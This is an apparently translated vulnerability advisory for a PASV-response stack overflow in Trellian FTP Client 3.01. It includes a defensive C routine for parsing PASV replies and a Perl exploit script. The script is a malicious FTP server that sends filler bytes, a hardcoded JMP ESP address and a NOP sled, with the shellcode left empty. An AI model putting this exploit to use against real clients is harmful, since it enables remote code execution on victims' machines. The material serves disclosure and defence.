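Affected versions:
Trellian FTP Client 3.01

Vulnerability description:
Trellian FTP is a commonly used FTP client.

The Trellian FTP client has a stack overflow vulnerability in its handling of FTP responses. A user who is tricked into connecting to a malicious FTP server and receives an overlong PASV response triggers the overflow, which leads to arbitrary code execution on the user's machine.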
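
One way an FTP client can reject an overlong or malformed PASV response before any of it is copied, shown as an added example that is not code from Trellian or from this advisory. The names `parse_pasv_reply`, `struct pasv_endpoint` and the 128-byte cap `PASV_MAX_LINE` are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed cap: a well-formed 227 line is far shorter; RFC 959 sets no limit. */
#define PASV_MAX_LINE 128

struct pasv_endpoint { uint8_t ip[4]; uint16_t port; };

/* Hypothetical helper. Returns 0 and fills *out, or -1 if the reply is
 * oversized or is not "227 ... (h1,h2,h3,h4,p1,p2)" with six values 0..255. */
int parse_pasv_reply(const char *line, size_t len, struct pasv_endpoint *out)
{
    unsigned v[6];
    size_t i, n = 0;
    const char *open;

    if (line == NULL || out == NULL || len < 4 || len > PASV_MAX_LINE)
        return -1;                 /* length is checked before any parsing */
    if (memcmp(line, "227 ", 4) != 0)
        return -1;
    open = memchr(line, '(', len);
    if (open == NULL)
        return -1;
    i = (size_t)(open - line) + 1;

    while (n < 6) {
        unsigned val = 0, digits = 0;
        /* At most three decimal digits per field, never reading past len. */
        while (i < len && digits < 3 && isdigit((unsigned char)line[i])) {
            val = val * 10 + (unsigned)(line[i] - '0');
            i++;
            digits++;
        }
        if (digits == 0 || val > 255 || i >= len)
            return -1;
        v[n++] = val;
        /* Fields are comma separated; the sixth must be closed by ')'. */
        if (line[i] != (n < 6 ? ',' : ')'))
            return -1;
        i++;
    }
    for (n = 0; n < 4; n++)
        out->ip[n] = (uint8_t)v[n];
    out->port = (uint16_t)((v[4] << 8) | v[5]);
    return 0;
}
```

The six values land in a fixed array of integers, so the size of the server's reply never determines how much is written to the stack.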

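Test method:

The programs (methods) provided on this site may be offensive in nature. They are for security research and teaching only; use at your own risk!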

# Exploit Title: Trellian FTP Client PASV BOF exploit
# Date: 2010-04-11
# Author: zombiefx
# Software Link:
# Version: Trellian FTP Client v 3.01
# Tested on: Windows XP SP3
# Usage: ./ftpserver.pl
# Acts as a fake ftp server that passes the vulnerable PASV command when a client connects.
# Code:
#!/usr/bin/perl
use warnings;
use strict;
use IO::Socket;
# Listen on the FTP control port (binding to port 21 usually needs privileges).
my $ftpsock =
  IO::Socket::INET->new( LocalPort => 21, Proto => 'tcp', Listen => 1 )
  or die "Socket Not Created $!\n";
print "#############################################################\n"
    . "#          Trellian FTP Client PASV BOF exploit             #\n"
    . "#          Author:zombiefx                                  #\n"
    . "#          Greetz to: corelanc0d3r/Dino Dai Zovi            #\n"
    . "#############################################################\n";
my $junk   = "\x41" x 200;              # filler bytes placed ahead of the address below
my $jmpesp = pack( 'V', 0x7E429353 );   #oops
my $nops   = "\x90" x 50;
my $calcshell = "";    # payload bytes omitted

# Answer each client command with a canned FTP reply; only the PASV reply is oversized.
while ( my $data = $ftpsock->accept() ) {
    print "Client Connected! Awaiting Ftp commands:\n";
    print $data "220 Welcome ;)!\r\n";
    while (<$data>) {
        print;    # echo the client's command to the console
        print $data "331 Anonymous access allowed,send e-mail as password.\r\n" if (/USER/i);
        print $data "230-Welcome to the EVIL server\r\n230 User logged in.\r\n" if (/PASS/i);
        print $data "257 \"http://www.2cto.com/\" is current directory.\r\n" if (/PWD/gis);
        print $data "227 Entering Passive Mode (".$junk.$jmpesp.$nops.$calcshell.").\r\n" if (/PASV/i);
        print $data "150 Here comes the directory listing.\r\n226 Directory send OK.\r\n" if (/LIST/i);
    }
}

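Security advice:
Vendor patch:

Trellian
--------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: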